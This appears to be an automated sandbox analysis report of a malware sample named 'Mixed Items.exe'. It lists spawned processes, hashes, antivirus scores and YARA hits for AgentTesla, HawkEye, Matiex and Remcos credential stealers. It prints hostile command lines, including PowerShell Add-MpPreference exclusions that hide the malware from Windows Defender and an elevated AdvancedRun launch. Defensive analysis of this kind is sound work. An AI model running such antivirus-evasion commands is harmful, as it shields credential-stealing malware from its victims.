                                                                                                    Path:C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:'C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                                                    Imagebase:0x400000
                                                                                                    File size:91000 bytes
                                                                                                    MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 3%, Metadefender, Browse
                                                                                                    • Detection: 0%, ReversingLabs
                                                                                                    Reputation:moderate

                                                                                                    General

                                                                                                    Start time:14:27:44
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:'C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe' /SpecialRun 4101d8 7032
                                                                                                    Imagebase:0x400000
                                                                                                    File size:91000 bytes
                                                                                                    MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:moderate

                                                                                                    General

                                                                                                    Start time:14:27:48
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Mixed Items.exe' -Force
                                                                                                    Imagebase:0xe70000
                                                                                                    File size:430592 bytes
                                                                                                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                    Reputation:high

                                                                                                    General

                                                                                                    Start time:14:27:49
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Mixed Items.exe' -Force
                                                                                                    Imagebase:0xe70000
                                                                                                    File size:430592 bytes
                                                                                                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                    Reputation:high

                                                                                                    General

                                                                                                    Start time:14:27:49
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6b2800000
                                                                                                    File size:625664 bytes
                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    General

                                                                                                    Start time:14:27:50
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe' -Force
                                                                                                    Imagebase:0xe70000
                                                                                                    File size:430592 bytes
                                                                                                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                    Reputation:high

                                                                                                    General

                                                                                                    Start time:14:27:50
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6b2800000
                                                                                                    File size:625664 bytes
                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    General

                                                                                                    Start time:14:27:51
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6b2800000
                                                                                                    File size:625664 bytes
                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    General

                                                                                                    Start time:14:27:52
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                    Imagebase:0x7ff7488e0000
                                                                                                    File size:51288 bytes
                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language

                                                                                                    General

                                                                                                    Start time:14:27:52
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                                                                                                    Imagebase:0x7ff7488e0000
                                                                                                    File size:51288 bytes
                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language

                                                                                                    General

                                                                                                    Start time:14:27:55
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                    Imagebase:0x7ff7488e0000
                                                                                                    File size:51288 bytes
                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language

                                                                                                    General

                                                                                                    Start time:14:27:55
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                    Imagebase:0x7ff7488e0000
                                                                                                    File size:51288 bytes
                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language

                                                                                                    General

                                                                                                    Start time:14:27:56
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                    Imagebase:0x7ff7488e0000
                                                                                                    File size:51288 bytes
                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language

                                                                                                    General

                                                                                                    Start time:14:27:56
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Users\user\Desktop\Mixed Items.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Users\user\Desktop\Mixed Items.exe
                                                                                                    Imagebase:0x470000
                                                                                                    File size:86808 bytes
                                                                                                    MD5 hash:017E52146C9131DBC9487D834CDFC247
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language

                                                                                                    General

                                                                                                    Start time:14:27:56
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                    Imagebase:0x7ff7488e0000
                                                                                                    File size:51288 bytes
                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language

                                                                                                    General

                                                                                                    Start time:14:27:57
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Users\user\Desktop\Mixed Items.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Users\user\Desktop\Mixed Items.exe
                                                                                                    Imagebase:0x40000
                                                                                                    File size:86808 bytes
                                                                                                    MD5 hash:017E52146C9131DBC9487D834CDFC247
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language

                                                                                                    General

                                                                                                    Start time:14:27:58
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Users\user\Desktop\Mixed Items.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:C:\Users\user\Desktop\Mixed Items.exe
                                                                                                    Imagebase:0x9a0000
                                                                                                    File size:86808 bytes
                                                                                                    MD5 hash:017E52146C9131DBC9487D834CDFC247
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:Visual Basic
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000003.321855545.0000000004361000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000003.328468981.00000000043CD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000019.00000002.347873362.0000000000403000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                    • Rule: JoeSecurity_Matiex, Description: Yara detected Matiex Keylogger, Source: 00000019.00000002.347873362.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 00000019.00000002.347873362.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000019.00000002.347873362.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000019.00000002.347873362.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000019.00000002.347873362.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000019.00000002.347873362.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000019.00000002.347873362.0000000000403000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                    • Rule: JoeSecurity_Matiex, Description: Yara detected Matiex Keylogger, Source: 00000019.00000003.313769407.00000000037B0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 00000019.00000003.313769407.00000000037B0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000003.300769006.0000000000FE3000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                    General

                                                                                                    Start time:14:27:58
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                    Imagebase:0x7ff7488e0000
                                                                                                    File size:51288 bytes
                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language

                                                                                                    General

                                                                                                    Start time:14:28:02
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe'
                                                                                                    Imagebase:0x7ff714890000
                                                                                                    File size:3933184 bytes
                                                                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language

                                                                                                    General

                                                                                                    Start time:14:28:04
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                    Imagebase:0x7ff714890000
                                                                                                    File size:3933184 bytes
                                                                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language

                                                                                                    General

                                                                                                    Start time:14:28:03
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                    Imagebase:0x7ff7488e0000
                                                                                                    File size:51288 bytes
                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language

                                                                                                    General

                                                                                                    Start time:14:28:04
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Users\user\AppData\Local\Temp\hawkgoods.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:'C:\Users\user\AppData\Local\Temp\hawkgoods.exe' 0
                                                                                                    Imagebase:0x4c0000
                                                                                                    File size:532992 bytes
                                                                                                    MD5 hash:FFDB58533D5D1362E896E96FB6F02A95
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                    Yara matches:
                                                                                                    • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001E.00000002.392659949.00000000004C2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001E.00000002.392659949.00000000004C2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001E.00000002.392659949.00000000004C2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001E.00000002.392659949.00000000004C2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                    • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001E.00000002.392659949.00000000004C2000.00000002.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                    • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000001E.00000002.473493158.0000000007AA0000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001E.00000002.446976394.0000000003BC1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001E.00000002.446976394.0000000003BC1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001E.00000000.309264681.00000000004C2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001E.00000000.309264681.00000000004C2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001E.00000000.309264681.00000000004C2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001E.00000000.309264681.00000000004C2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                    • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001E.00000000.309264681.00000000004C2000.00000002.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                    • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001E.00000002.445844944.0000000002FEC000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, Author: Arnim Rupp
                                                                                                    • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, Author: Joe Security
                                                                                                    • Rule: Hawkeye, Description: detect HawkEye in memory, Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, Author: JPCERT/CC Incident Response Group
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 100%, Avira
                                                                                                    • Detection: 100%, Avira
                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                    • Detection: 96%, ReversingLabs

                                                                                                    General

                                                                                                    Start time:14:28:05
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Users\user\AppData\Local\Temp\Matiexgoods.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:'C:\Users\user\AppData\Local\Temp\Matiexgoods.exe' 0
                                                                                                    Imagebase:0x4d0000
                                                                                                    File size:455680 bytes
                                                                                                    MD5 hash:80C61B903400B534858D047DD0919F0E
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_Matiex, Description: Yara detected Matiex Keylogger, Source: 0000001F.00000002.476632403.00000000004D2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 0000001F.00000002.476632403.00000000004D2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Matiex, Description: Yara detected Matiex Keylogger, Source: 0000001F.00000000.312425541.00000000004D2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 0000001F.00000000.312425541.00000000004D2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001F.00000002.517244738.00000000028D1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Matiex, Description: Yara detected Matiex Keylogger, Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe, Author: Joe Security
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 100%, Avira
                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                    • Detection: 54%, Metadefender, Browse
                                                                                                    • Detection: 90%, ReversingLabs

                                                                                                    General

                                                                                                    Start time:14:28:07
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe'
                                                                                                    Imagebase:0x410000
                                                                                                    File size:86808 bytes
                                                                                                    MD5 hash:017E52146C9131DBC9487D834CDFC247
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 21%, ReversingLabs

                                                                                                    General

                                                                                                    Start time:14:28:08
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Users\user\AppData\Local\Temp\origigoods20.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:'C:\Users\user\AppData\Local\Temp\origigoods20.exe' 0
                                                                                                    Imagebase:0xe50000
                                                                                                    File size:220672 bytes
                                                                                                    MD5 hash:61DC57C6575E1F3F2AE14C1B332AD2FB
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000021.00000002.476654920.0000000000E52000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000021.00000002.516404488.0000000003411000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000021.00000002.516404488.0000000003411000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe, Author: Joe Security
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 100%, Avira
                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                    • Detection: 43%, Metadefender, Browse
                                                                                                    • Detection: 93%, ReversingLabs

                                                                                                    General

                                                                                                    Start time:14:28:11
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe'
                                                                                                    Imagebase:0x7ff714890000
                                                                                                    File size:3933184 bytes
                                                                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language

                                                                                                    General

                                                                                                    Start time:14:28:14
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                    Imagebase:0x7ff714890000
                                                                                                    File size:3933184 bytes
                                                                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language

                                                                                                    General

                                                                                                    Start time:14:28:14
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Users\user\AppData\Local\Temp\origigoods40.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:'C:\Users\user\AppData\Local\Temp\origigoods40.exe' 0
                                                                                                    Imagebase:0x160000
                                                                                                    File size:221696 bytes
                                                                                                    MD5 hash:AE36F0D16230B9F41FFECBD3C5B1D660
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000024.00000002.510313698.0000000002771000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000024.00000002.510313698.0000000002771000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000024.00000002.476647618.0000000000162000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000024.00000000.332943540.0000000000162000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe, Author: Joe Security
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 100%, Avira
                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                    • Detection: 43%, Metadefender, Browse
                                                                                                    • Detection: 86%, ReversingLabs

                                                                                                    Disassembly

                                                                                                    Code Analysis

                                                                                                    Reset < >